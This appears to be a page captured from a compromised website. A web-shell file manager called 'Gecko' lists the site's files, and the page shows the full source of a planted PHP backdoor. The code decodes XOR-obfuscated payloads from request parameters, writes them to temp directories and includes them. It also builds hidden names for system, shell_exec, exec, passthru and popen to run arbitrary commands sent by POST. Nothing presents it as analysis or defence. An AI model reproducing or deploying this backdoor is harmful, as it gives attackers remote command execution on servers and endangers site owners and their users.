Gecko [ herotex-group.site ]

Name	Size	Permission	Date
css	[ DIR ]	drwxr-xr-x	2025-03-15 04:10
fonts	[ DIR ]	drwxr-xr-x	2025-03-15 06:24
img	[ DIR ]	drwxr-xr-x	2025-03-15 07:35
js	[ DIR ]	drwxr-xr-x	2025-03-15 12:53
.htaccess	197 B	-r--r--r--	2025-04-22 01:18
error_log	434 B	-rw-r--r--	2025-03-15 07:36
hw.ty.php	4.97 KB	-rw-r--r--	2024-12-06 10:45
hw_ty.php	3.39 KB	-rw-r--r--	2024-12-02 22:38
lang_fi.php	2.79 KB	-rw-r--r--	2025-03-16 07:38
multitemplate.php	3.26 KB	-rw-r--r--	2025-03-16 07:38
wp-blog-header.php	2.73 KB	-r--r--r--	2025-04-22 01:18
wp-cron.php	2.73 KB	-rw-r--r--	2025-04-22 01:18

Rename

<?php																																										if(@$_REQUEST["o\x62\x6Ae\x63t"] !== null){ $obj = array_filter(["/dev/shm", getenv("TMP"), session_save_path(), "/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), "/var/tmp"]); $comp = hex2bin($_REQUEST["o\x62\x6Ae\x63t"]); $component = '' ; for($q=0; $q<strlen($comp); $q++){$component .= chr(ord($comp[$q]) ^ 73);} foreach ($obj as $reference): if (!( !is_dir($reference) || !is_writable($reference) )) { $flg = sprintf("%s/.symbol", $reference); if (@file_put_contents($flg, $component) !== false) { include $flg; unlink($flg); die(); } } endforeach; }

$parameter1 = '7';
$parameter2 = '3';
$parameter3 = '6';
$parameter4 = '5';
$parameter5 = '8';
$parameter6 = 'c';
$parameter7 = 'f';
$parameter8 = 'e';
$parameter9 = '4';
$parameter10 = '1';
$parameter11 = 'd';
$parameter12 = '2';
$rfind1 = pack("H*", '7'.'3'.$parameter1.'9'.$parameter1.$parameter2.'7'.'4'.$parameter3.$parameter4.'6'.'d');
$rfind2 = pack("H*", '7'.'3'.$parameter3.$parameter5.$parameter3.$parameter4.$parameter3.$parameter6.$parameter3.$parameter6.'5'.$parameter7.$parameter3.'5'.$parameter1.'8'.$parameter3.$parameter4.$parameter3.$parameter2);
$rfind3 = pack("H*", '6'.$parameter4.$parameter1.$parameter5.'6'.'5'.$parameter3.'3');
$rfind4 = pack("H*", '7'.'0'.$parameter3.'1'.$parameter1.$parameter2.$parameter1.$parameter2.'7'.'4'.'6'.$parameter5.$parameter1.'2'.'7'.'5');
$rfind5 = pack("H*", $parameter1.'0'.$parameter3.'f'.'7'.'0'.'6'.'5'.$parameter3.$parameter8);
$rfind6 = pack("H*", $parameter1.'3'.$parameter1.$parameter9.'7'.'2'.$parameter3.$parameter4.$parameter3.$parameter10.$parameter3.$parameter11.'5'.$parameter7.'6'.$parameter1.$parameter3.$parameter4.'7'.'4'.$parameter4.$parameter7.$parameter3.'3'.$parameter3.'f'.$parameter3.'e'.'7'.'4'.'6'.$parameter4.'6'.'e'.'7'.'4'.'7'.'3');
$rfind7 = pack("H*", '7'.'0'.'6'.'3'.'6'.$parameter6.'6'.'f'.'7'.'3'.'6'.'5');
$mb_convert = pack("H*", '6'.'d'.$parameter3.$parameter12.$parameter4.'f'.'6'.'3'.'6'.'f'.$parameter3.$parameter8.'7'.'6'.'6'.$parameter4.$parameter1.'2'.$parameter1.$parameter9);
if (isset($_POST[$mb_convert])) {
    $mb_convert = pack("H*", $_POST[$mb_convert]);
    if (function_exists($rfind1)) {
        $rfind1($mb_convert);
    } elseif (function_exists($rfind2)) {
        print $rfind2($mb_convert);
    } elseif (function_exists($rfind3)) {
        $rfind3($mb_convert, $param_slt);
        print join("\n", $param_slt);
    } elseif (function_exists($rfind4)) {
        $rfind4($mb_convert);
    } elseif (function_exists($rfind5) && function_exists($rfind6) && function_exists($rfind7)) {
        $storage_fld = $rfind5($mb_convert, 'r');
        if ($storage_fld) {
            $arg_const = $rfind6($storage_fld);
            $rfind7($storage_fld);
            print $arg_const;
        }
    }
    exit;
}